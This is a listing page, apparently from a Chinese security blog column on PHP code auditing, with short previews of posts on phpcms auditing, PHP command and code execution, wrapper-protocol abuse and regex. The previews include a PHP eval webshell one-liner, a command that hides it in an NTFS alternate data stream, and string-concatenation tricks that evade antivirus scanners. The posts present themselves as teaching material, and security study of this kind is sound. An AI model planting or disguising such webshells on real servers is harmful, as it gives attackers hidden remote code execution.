![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
代码审计
文章平均质量分 74
XG小刚
这个作者很懒,什么都没留下…
展开
-
代码审计-phpcms
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途phpcms代码审计代码审计-phpcms低版本phpcms通读代码目录结构网站入口返回头看上面加载的几个函数库查看自动加载函数跳回index.php参数传递开始审计端口探测后台GetshellSQL注入代码审计-phpcms最近在学习php代码审计,各种复现、各种测试搞得我头昏脑胀。网上很多代码审计的复现博客看似讲的很清楚,最后自己也复现出来了,但是很多小白(比如我)以为懂了这个漏洞,但实际.原创 2020-12-14 16:01:35 · 486 阅读 · 0 评论 -
PHP一句话木马免杀(3)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.ADS隐藏。2.修改.htaccess文件3.修改php.ini4.一句话拆分小结免杀小技巧1.ADS隐藏。windows数据流有个很好的方式隐藏数据。通过命令行echo ^<?php @eval($_POST['pwd']);?^> > shell.php:123.jpg会在本地生成一个shell.php文件,但打开却发现没有内容.原创 2020-10-14 10:15:29 · 954 阅读 · 1 评论 -
PHP一句话木马免杀(2)
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.隐藏php文件。2.逻辑判断木马3.数字运算构造木马4.内存木马,也称不死马。小结免杀小技巧1.隐藏php文件。在windows下有个attrib命令,能够帮助我们实现文件的隐藏。atttrib +s +a +h +r shell.php #隐藏atttrib -s -a -h -r shell.php #显示2.逻辑判断木马<? @eval.原创 2020-10-14 09:54:32 · 794 阅读 · 0 评论 -
代码审计-php命令执行
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途php命令执行前言返回执行结果无返回执行结果命令执行小技巧1.在命令执行过程中,我们会遇到空格被删除或者替换的情况2.在命令执行过程中,我们会进行多条命令执行防范措施前言近期在学习php的代码审计,推一下这本书啊代码审计 企业级Web代码安全架构_尹毅著。前篇文章介绍过代码执行了,现在写写命令执行。命令执行就是执行命令,执行win和Linux的系统命令php中有好几个可以执行系统命令的.原创 2020-07-27 16:44:19 · 631 阅读 · 0 评论 -
PHP一句话木马免杀
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途PHP木马免杀小技巧免杀小技巧1.字符串拼接方式,构造敏感函数。2.通过PHP的动态函数方法执行一句话。3.利用php异或^构造字符串免杀木马构造一句话测试异或转码数据免杀小技巧1.字符串拼接方式,构造敏感函数。<?php$a = 'ass';$b = 'er';$c = 't';$d = $a.$b.$c; //assert2.通过PHP的动态函数方法执行一句话。<.原创 2020-07-26 19:54:56 · 6299 阅读 · 4 评论 -
代码审计-php伪协议利用
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于其它用途php伪协议利用什么是伪协议常用协议1.file://访问本地文件系统2.php:// 访问各个输入/输出流3.data:// — 数据4.zip和phar总结什么是伪协议PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。file://访问本地文件系统http:.原创 2020-07-23 11:13:01 · 480 阅读 · 0 评论 -
代码审计-php代码执行
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途php代码执行前言什么是代码执行,命令执行1.eval assert导致的代码执行2.preg_replace的e修饰符3.调用函数导致的代码执行4.动态函数执行ThinkPHP历史漏洞修复措施前言近期在学习php的代码审计,推一下这本书啊代码审计 企业级Web代码安全架构_尹毅著。在学习代码执行和命令执行中遇到很多的小问题,再本文章中记一下。先说几个php小要点:1.当代码赋值时用的.原创 2020-07-16 10:11:42 · 965 阅读 · 0 评论 -
正则表达式--大集合
作者:小刚一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢本实验仅用于信息防御教学,切勿用于它用途正则表达式一,校验数字二,校验字符三,常用规则网络上收集的各种正则表达式大杂烩,亲测有效。有啥好的正则表达可以在评论区评论哦。一,校验数字数字^[0-9]*$n位的数字^\d{n}$至少n位的数字^\d{n,}$m-n位的数字^\d{m,n}$零和非零开头的数字^(0|[1-9][0-9]*)$非零开头的最多带两位小数的数字^([1-9].原创 2020-05-09 18:55:55 · 403 阅读 · 0 评论